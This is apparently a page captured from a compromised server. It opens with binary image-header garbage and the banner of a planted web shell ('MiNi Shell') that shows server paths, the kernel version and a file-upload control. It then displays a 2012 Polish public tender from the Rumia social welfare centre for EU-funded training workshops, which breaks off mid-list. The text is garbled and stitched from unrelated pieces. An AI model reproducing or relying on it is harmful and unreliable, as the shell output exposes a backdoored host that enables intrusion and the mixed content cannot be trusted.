JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/90482-N-2012.html

<p class="kh_header"><b>Rumia: Przedmiotem zamówienia jest usługa w postaci szkolenia zawodowego w ramach projektu Razem ku lepszej przyszłości współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 90482 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Rumi , ul. Abrahama 17, 84-230 Rumia, woj. pomorskie, tel. 058 6710556, faks 058 6610836.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.rumia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa w postaci szkolenia zawodowego w ramach projektu Razem ku lepszej przyszłości współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa w postaci szkolenia grupowego sklasyfikowana zgodnie z kodem
CPV 80530000-8: w ramach projektu Razem ku lepszej przyszłości  współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.
1. CZĘŚĆ A: Warsztaty aktywizacji zawodowej
Przedmiotem zamówienia jest wykonanie warsztatów aktywizacji zawodowej dla grupy 20 osób, współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez doradcę zawodowego posiadającego odpowiednie kwalifikacje.
1.	Program szkolenia winien obejmować:
1)	Sporządzanie dokumentów niezbędnych do poszukiwania pracy (CV, list motywacyjny),
2)	Przygotowanie się do rozmowy kwalifikacyjnej,
3)	Znaczenie autoprezentacji w poszukiwaniu zatrudnienia,
4)	Umiejętność poszukiwania właściwej oferty pracy,
5)	Aktywne poszukiwanie pracy
6)	Rynek pracy
7)	Formy zatrudnienia,
8)	Określenie indywidualnych planów działań,
Celem warsztatów jest poprawa motywacji i wiary we własne siły, podwyższenie umiejętności efektywnego  poszukiwania pracy, co przyczyni się do przygotowania osób narażonych na wykluczenie społeczne do wejścia na rynek pracy.
2.    Liczba osób objętych szkoleniem - 20.
3.	Szkolenie zostanie przeprowadzone w jednej grupie 20-osobowej
4.	Liczba godzin szkolenia: Ogółem 30 godzin zegarowych wraz z przerwami, 
5.	Termin realizacji zamówienia: maj 2012 r.: Dni robocze w terminie od 14.05.2012 r. do 18.05.2012 r., obejmujące 5 dni po 6 godzin.
6.	Wykonawca zobowiązany jest do ubezpieczenia każdego uczestnika warsztatów od następstw nieszczęśliwych wypadków, w okresie realizacji umowy, na kwotę co najmniej 5000,00 zł. 
7.	Uczestnicy warsztatów muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci:
a.	zeszyt,
b.	długopis,
c.	identyfikator,
d.	podręcznik lub inną literaturę z zakresu tematyki objętej programem szkolenia,
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność.
Dodatkowo jeden zestaw materiałów szkoleniowych zostanie przekazany Zamawiającemu wraz z dokumentacją przebiegu kształcenia.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia (na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć).
8.	Wykonawca zapewnia każdemu uczestnikowi szkolenia gorący posiłek (tzw. drugie danie zawierające ziemniaki (frytki, ryż), surówki oraz mięso) w każdym dniu realizacji szkolenia oraz poczęstunek w formie kawy, herbaty, zimnych napojów, słodyczy. Koszt niniejszych posiłków należy uwzględnić w kalkulacji kosztów szkolenia. Odbiór posiłków musi zostać pokwitowany przez uczestników szkolenia (na bieżąco zgodnie z realizowanym harmonogramem zajęć).
9.	Zagadnienia powinny być szczegółowo rozpisane w programie warsztatów, określające temat zajęć edukacyjnych.
10.	Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
11.	Lokal, w którym będą przeprowadzane zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt, umożliwiające prawidłową realizację kształcenia będącego przedmiotem zamówienia. Dodatkowo lokal powinien zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - oznakowanie zgodnie z Załącznikiem nr 1
12.	Miejscem wykonania zamówienia jest Rumia.
13.	Szkolenie winno być przeprowadzone zgodnie z programem szkolenia oraz przedstawionym harmonogramem uwzględniającym godzinowy podział zajęć. 
14.	Po zakończeniu szkolenia w celu ocenienia jakości zrealizowanej usługi Wykonawca przekaże uczestnikom szkolenia do wypełnienia ankietę, stanowiącą Załącznik nr 3 do SIWZ. Ankiety zostaną wypełnione przez uczestników anonimowo i dostarczone Zamawiającemu po zakończeniu szkolenia.
15.	Warsztaty rozpoczną się i zakończą się testem umożliwiającym ocenę poziomu opanowania wiedzy i umiejętności z zakresu programu warsztatów. Analiza tych ankiet pozwoli ocenić osiągnięcie założonych rezultatów. Co najmniej na 3 dni przed rozpoczęciem warsztatów Wykonawca przedstawi Zamawiającemu wzory ankiet. 
16.	Wykonawca każdemu uczestnikowi warsztatów, który je ukończy, wystawi odpowiednie zaświadczenie. Zaświadczenie winno zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
17.	Wykonawca zobowiązany jest do :
a.	Prowadzenia  dokumentacji przebiegu warsztatów zawierającej ologowanie zgodne z obowiązującymi Wytycznymi dotyczącymi Oznaczania Projektów w ramach Programu Operacyjnego Kapitał Ludzki. Wzory papieru firmowego projektu zawiera załącznik nr 2
b.	Zarejestrowania w internetowej bazie ofert szkoleniowych, dostępnej na stronie internetowej (www.inwestycjawkadry.info.pl) szkolenia realizowanego w ramach  umowy zgodnie z zakresem danych wymaganych formularzem internetowym.
c.	Systematycznej oceny postępów uczestników warsztatów, indywidualizacji kształcenia w przypadku wystąpienia trudności w procesie nauczania.
d.	Bieżącego informowania na piśmie MOPS o przypadkach nieobecności na szkoleniu uczestników szkolenia oraz w wypadku rezygnacji z uczestnictwa w szkoleniu w trakcie ich trwania.
e.	Wydania uczestnikom kończącym szkolenie z wynikiem pozytywnym, w terminie do 7 dni od daty dokonania oceny, stosownych zaświadczeń.
f.	Przekazania zamawiającemu w terminie 7 dni po zakończeniu szkolenia dokumentacji określonej w punkcie 22 opisu przedmiotu zamówienia.
g.	Promocji oraz reklamy projektu i informacji pisemnej dla uczestników szkoleń o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego. Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki dostępne są na stronie internetowej: www.defs.woj-pomorskie.pl w zakładce: promocja.
h.	Przechowywania wszystkich dokumentów potwierdzających realizację szkolenia do 31.12.2020 r. zgodnie z Rozporządzeniem Rady (WE) nr 1260/1999 z dnia 21.06.1999 r. ustanawiającym przepisy ogólne w sprawie funduszy strukturalnych oraz Rozporządzenia Komisji (WE) nr 1685/2000 z dnia 28.07.2000 r. i Rozporządzenia Komisji (WE) nr 1145/2003 z dnia 27.06.2003 r. w sprawie szczegółowych zasad wykonywania Rozporządzenia Rady.
i.	Niezwłocznego informowania na piśmie listem poleconym bądź faksem o zaistniałych przeszkodach w realizacji programu warsztatów. 
18.	Potwierdzeniem prawidłowo zrealizowanej przez Wykonawcę usługi jest przekazanie wskazanej wyżej dokumentacji i podpisanie protokołu zdawczo-odbiorczego z Zamawiającym.

2. CZĘŚĆ B: Obsługa komputera
Przedmiotem zamówienia jest wykonanie szkolenia z zakresu obsługi komputera i umiejętności wykorzystania Internetu dla grupy 20 osób, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez trenera posiadającego odpowiednie wykształcenie, kwalifikacje i doświadczenie.
1.	Program szkolenia winien obejmować:
1)	Microsoft Windows,
2)	Microsoft Word,
3)	Microsoft Exel,
4)	Internet,
5)	Poczta elektroniczna,
6)	Power Point,
Celem warsztatów jest nauka i  podniesienie umiejętności w zakresie opisanym w programie szkolenia, co wpłynie na przygotowanie osób objętych szkoleniem do wejścia na rynek pracy.
2.	 Liczba osób objętych szkoleniem - 20.
3.	Szkolenie zostanie przeprowadzone w jednej grupie 20-osobowej
4.	Liczba godzin szkolenia: Ogółem 60 godzin zegarowych wraz z przerwami, 
5.	Termin realizacji zamówienia: czerwiec - lipiec 2012 r.: Dni robocze w terminie od 25.06.2012 r. do 06.07.2012 r., obejmujące 10 dni po 6 godzin.
6.	Wykonawca zobowiązany jest do ubezpieczenia każdego uczestnika warsztatów od następstw nieszczęśliwych wypadków, w okresie realizacji umowy, na kwotę co najmniej 5000,00 zł. 
7.	Uczestnicy warsztatów muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci:
1)	zeszyt,
2)	długopis,
3)	identyfikator,
4)	podręcznik lub inną literaturę z zakresu tematyki objętej programem szkolenia,
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność.
Dodatkowo jeden zestaw materiałów szkoleniowych zostanie przekazany Zamawiającemu wraz z dokumentacją przebiegu kształcenia.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia (na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć).
8.	Wykonawca zapewnia każdemu uczestnikowi szkolenia gorący posiłek (tzw. drugie danie zawierające ziemniaki (frytki, ryż), surówki oraz mięso) w każdym dniu realizacji szkolenia oraz poczęstunek w formie kawy, herbaty, zimnych napojów, słodyczy. Koszt niniejszych posiłków należy uwzględnić w kalkulacji kosztów szkolenia. Odbiór posiłków musi zostać pokwitowany przez uczestników szkolenia (na bieżąco zgodnie z realizowanym harmonogramem zajęć).
9.	Zagadnienia powinny być szczegółowo rozpisane w programie warsztatów, określające temat zajęć edukacyjnych.
10.	Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
11.	Lokal, w którym będą przeprowadzane zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt, umożliwiające prawidłową realizację kształcenia będącego przedmiotem zamówienia. Dodatkowo lokal powinien zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - oznakowanie zgodnie z Załącznikiem nr 1
12.	Miejscem wykonania zamówienia jest Rumia.
13.	Po zakończeniu szkolenia w celu ocenienia jakości zrealizowanej usługi Wykonawca przekaże uczestnikom szkolenia do wypełnienia ankietę, stanowiącą Załącznik nr 3 do SIWZ. Ankiety zostaną wypełnione przez uczestników anonimowo i dostarczone Zamawiającemu po zakończeniu szkolenia.
14.	Warsztaty rozpoczną się i zakończą się testem umożliwiającym ocenę poziomu opanowania wiedzy i umiejętności z zakresu programu warsztatów. Analiza tych ankiet pozwoli ocenić osiągnięcie założonych rezultatów. Co najmniej na 3 dni przed rozpoczęciem warsztatów Wykonawca przedstawi Zamawiającemu wzory ankiet. 
15.	Wykonawca każdemu uczestnikowi warsztatów, który je ukończy, wystawi odpowiednie zaświadczenie. Zaświadczenie winno zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
16.	Wykonawca zobowiązany jest do :
1)	Prowadzenia  dokumentacji przebiegu warsztatów zawierającej ologowanie zgodne z obowiązującymi Wytycznymi dotyczącymi Oznaczania Projektów w ramach Programu Operacyjnego Kapitał Ludzki. Wzory papieru firmowego projektu zawiera załącznik nr 2
2)	Zarejestrowania w internetowej bazie ofert szkoleniowych, dostępnej na stronie internetowej (www.inwestycjawkadry.info.pl) szkolenia realizowanego w ramach  umowy zgodnie z zakresem danych wymaganych formularzem internetowym.
3)	Systematycznej oceny postępów uczestników warsztatów, indywidualizacji kształcenia w przypadku wystąpienia trudności w procesie nauczania.
4)	Bieżącego informowania na piśmie MOPS o przypadkach nieobecności na szkoleniu uczestników szkolenia oraz w wypadku rezygnacji z uczestnictwa w szkoleniu w trakcie ich trwania.
5)	Wydania uczestnikom kończącym szkolenie z wynikiem pozytywnym, w terminie do 7 dni od daty dokonania oceny, stosownych zaświadczeń.
6)	Przekazania zamawiającemu w terminie 7 dni po zakończeniu szkolenia dokumentacji określonej w punkcie 22 opisu przedmiotu zamówienia.
7)	Promocji oraz reklamy projektu i informacji pisemnej dla uczestników szkoleń o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego. Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki dostępne są na stronie internetowej: www.defs.woj-pomorskie.pl w zakładce: promocja.
8)	Przechowywania wszystkich dokumentów potwierdzających realizację szkolenia do 31.12.2020 r. zgodnie z Rozporządzeniem Rady (WE) nr 1260/1999 z dnia 21.06.1999 r. ustanawiającym przepisy ogólne w sprawie funduszy strukturalnych oraz Rozporządzenia Komisji (WE) nr 1685/2000 z dnia 28.07.2000 r. i Rozporządzenia Komisji (WE) nr 1145/2003 z dnia 27.06.2003 r. w sprawie szczegółowych zasad wykonywania Rozporządzenia Rady.
9)	Niezwłocznego informowania na piśmie listem poleconym bądź faksem o zaistniałych przeszkodach w realizacji programu warsztatów. 
17.	Potwierdzeniem prawidłowo zrealizowanej przez Wykonawcę usługi jest przekazanie wskazanej wyżej dokumentacji i podpisanie protokołu zdawczo-odbiorczego z Zamawiającym.

3. CZĘŚĆ C: Szkoła dla rodziców
Przedmiotem zamówienia jest przeprowadzenie warsztatów Szkoła dla rodziców, dla grupy 20 osób, współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez psychologa.
1.	 Program szkolenia winien obejmować:
1)	poznanie i rozumienie świata uczuć własnych oraz dziecka.
2)	świadomość własnych celów wychowania
3)	system kar i nagród
4)	naukę umiejętności rozmawiania o uczuciach .
5)	umiejętność stawiania jasnych granic i wymagań
6)	zachęcanie dzieci do współpracy
7)	wspólne rozwiązywanie konfliktów
8)	poszukiwanie lepszych niż kara sposobów uczenia dziecka samodyscypliny
9)	wspieranie samodzielności dzieci
10)	uwalnianie dzieci od grania ról oraz wzmacnianie ich poczucia własnej wartości przez pochwałę opisową
Celem warsztatów jest wspieranie rodziców w radzeniu sobie w codziennych kontaktach z dziećmi. Realizacja programu powinna się przyczynić do podwyższenia ich umiejętności społecznych i wychowawczych oraz zwiększenia spójności rodziny.
2.	Liczba osób objętych szkoleniem - 20.
3.	Szkolenie zostanie przeprowadzone w jednej grupie 20-osobowej
4.	Liczba godzin szkolenia: Ogółem 36 godzin zegarowych wraz z przerwami, 
5.	Termin realizacji zamówienia:  maj - wrzesień 2012 r.: Dni robocze, w terminach: 10.05.2012 r.; 24.05.2012 r.; 31.05.2012 r.; 14.06.2012 r.; 21.06.2012 r.; 12.07.2012 r.; 19.07.2012 r.; 09.08.2012 r.; 23.08.2012 r.; 30.08.2012 r.; 06.09.2012 r.; 13.09.2012 r. obejmujące 12 dni po 3 godziny..
6.	Wykonawca zobowiązany jest do ubezpieczenia każdego uczestnika warsztatów od następstw nieszczęśliwych wypadków, w okresie realizacji umowy, na kwotę co najmniej 5000,00 zł. 
7.	Uczestnicy warsztatów muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci:
a)zeszyt,
b)długopis,
c)identyfikator,
d)podręcznik lub inną literaturę z zakresu tematyki objętej programem szkolenia,
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność.
Dodatkowo jeden zestaw materiałów szkoleniowych zostanie przekazany Zamawiającemu wraz z dokumentacja przebiegu kształcenia.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia (na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć).
8.	Wykonawca zapewnia każdemu uczestnikowi szkolenia, w każdym dniu realizacji szkolenia poczęstunek w formie kawy, herbaty, zimnych napojów, słodyczy. Koszt niniejszych posiłków należy uwzględnić w kalkulacji kosztów szkolenia. Odbiór posiłków musi zostać pokwitowany przez uczestników szkolenia (na bieżąco zgodnie z realizowanym harmonogramem zajęć).
9.	Zagadnienia powinny być szczegółowo rozpisane w programie warsztatów, określające temat zajęć edukacyjnych.
10.	Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
11.	Lokal, w którym będą przeprowadzane zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt, umożliwiające prawidłową realizację kształcenia będącego przedmiotem zamówienia. Dodatkowo lokal powinien zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - oznakowanie zgodnie z Załącznikiem nr 1
12.	Miejscem wykonania zamówienia jest Rumia.
13.	Po zakończeniu szkolenia w celu ocenienia jakości zrealizowanej usługi Wykonawca przekaże uczestnikom szkolenia do wypełnienia ankietę, stanowiącą Załącznik nr 3 do SIWZ. Ankiety zostaną wypełnione przez uczestników anonimowo i dostarczone Zamawiającemu po zakończeniu szkolenia.
14.	Warsztaty rozpoczną się i zakończą się testem umożliwiającym ocenę poziomu opanowania wiedzy i umiejętności z zakresu programu warsztatów. Analiza tych ankiet pozwoli ocenić osiągnięcie założonych rezultatów. Co najmniej na 3 dni przed rozpoczęciem warsztatów Wykonawca przedstawi Zamawiającemu wzory ankiet. 
15.	Wykonawca każdemu uczestnikowi warsztatów, który je ukończy, wystawi odpowiednie zaświadczenie. Zaświadczenie winno zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
16.	Wykonawca zobowiązany jest do :
1)	Prowadzenia  dokumentacji przebiegu warsztatów zawierającej ologowanie zgodne z obowiązującymi Wytycznymi dotyczącymi Oznaczania Projektów w ramach Programu Operacyjnego Kapitał Ludzki. Wzory papieru firmowego projektu zawiera załącznik nr 2
2)	Zarejestrowania w internetowej bazie ofert szkoleniowych, dostępnej na stronie internetowej (www.inwestycjawkadry.info.pl) szkolenia realizowanego w ramach  umowy zgodnie z zakresem danych wymaganych formularzem internetowym.
3)	Systematycznej oceny postępów uczestników warsztatów, indywidualizacji kształcenia w przypadku wystąpienia trudności w procesie nauczania.
4)	Bieżącego informowania na piśmie MOPS o przypadkach nieobecności na szkoleniu uczestników szkolenia oraz w wypadku rezygnacji z uczestnictwa w szkoleniu w trakcie ich trwania.
5)	Wydania uczestnikom kończącym szkolenie z wynikiem pozytywnym, w terminie do 7 dni od daty dokonania oceny, stosownych zaświadczeń.
6)	Przekazania zamawiającemu w terminie 7 dni po zakończeniu szkolenia dokumentacji określonej w punkcie 22 opisu przedmiotu zamówienia.
7)	Promocji oraz reklamy projektu i informacji pisemnej dla uczestników szkoleń o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego. Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki dostępne są na stronie internetowej: www.defs.woj-pomorskie.pl w zakładce: promocja.
8)	Przechowywania wszystkich dokumentów potwierdzających realizację szkolenia do 31.12.2020 r. zgodnie z Rozporządzeniem Rady (WE) nr 1260/1999 z dnia 21.06.1999 r. ustanawiającym przepisy ogólne w sprawie funduszy strukturalnych oraz Rozporządzenia Komisji (WE) nr 1685/2000 z dnia 28.07.2000 r. i Rozporządzenia Komisji (WE) nr 1145/2003 z dnia 27.06.2003 r. w sprawie szczegółowych zasad wykonywania Rozporządzenia Rady.
9)	Niezwłocznego informowania na piśmie listem poleconym bądź faksem o zaistniałych przeszkodach w realizacji programu warsztatów. 
17.	Potwierdzeniem prawidłowo zrealizowanej przez Wykonawcę usługi jest przekazanie wskazanej wyżej dokumentacji i podpisanie protokołu zdawczo-odbiorczego z Zamawiającym.

4. CZĘŚĆ D: Warsztaty umiejętności psychospołecznych
Przedmiotem zamówienia jest wykonanie warsztatów umiejętności psychospołecznych dla grupy 20 osób, współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez psychologa.
18.	Program szkolenia winien obejmować:
1)	Podstawowe pojęcia i zagadnienia dotyczące umiejętności psychospołecznych.
2)	Samopoznanie i bilans umiejętności
3)	Asertywność i wiara we własne siły
4)	Autoprezentacja i kształtowanie własnego wizerunku
5)	Zarządzanie stresem
6)	Umiejętność rozwiązywania konfliktów
7)	Sposoby radzenia sobie w kryzysie emocjonalnym
8)	Zarządzanie czasem i pracą własną
9)	Relacje w rodzinie, budowanie więzi.
Celem warsztatów jest poznanie przez uczestników swoich mocnych stron, podwyższenie własnej samooceny, zwiększenie motywacji do działania i zaufania we własne możliwości.
19.	Liczba osób objętych szkoleniem - 20.
20.	Szkolenie zostanie przeprowadzone w jednej grupie 20-osobowej
21.	Liczba godzin szkolenia: Ogółem 30 godzin zegarowych wraz z przerwami, 
22.	Termin realizacji zamówienia: kwiecień 2012 r.: Dni robocze w terminie od 23.04.2012 r. do 27.04.2012 r., obejmujące 5 dni po 6 godzin.
23.	Wykonawca zobowiązany jest do ubezpieczenia każdego uczestnika warsztatów od następstw nieszczęśliwych wypadków, w okresie realizacji umowy, na kwotę co najmniej 5000,00 zł. 
24.	Uczestnicy warsztatów muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci:
1)	zeszyt,
2)	długopis,
3)	identyfikator,
4)	podręcznik lub inną literaturę z zakresu tematyki objętej programem szkolenia,
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność.
Dodatkowo jeden zestaw materiałów szkoleniowych zostanie przekazany Zamawiającemu wraz z dokumentacja przebiegu kształcenia.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia (na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć).
25.	Wykonawca zapewnia każdemu uczestnikowi szkolenia gorący posiłek (tzw. drugie danie zawierające ziemniaki (frytki, ryż), surówki oraz mięso) w każdym dniu realizacji szkolenia oraz poczęstunek w formie kawy, herbaty, zimnych napojów, słodyczy. Koszt niniejszych posiłków należy uwzględnić w kalkulacji kosztów szkolenia. Odbiór posiłków musi zostać pokwitowany przez uczestników szkolenia (na bieżąco zgodnie z realizowanym harmonogramem zajęć).
26.	Zagadnienia powinny być szczegółowo rozpisane w programie warsztatów, określające temat zajęć edukacyjnych.
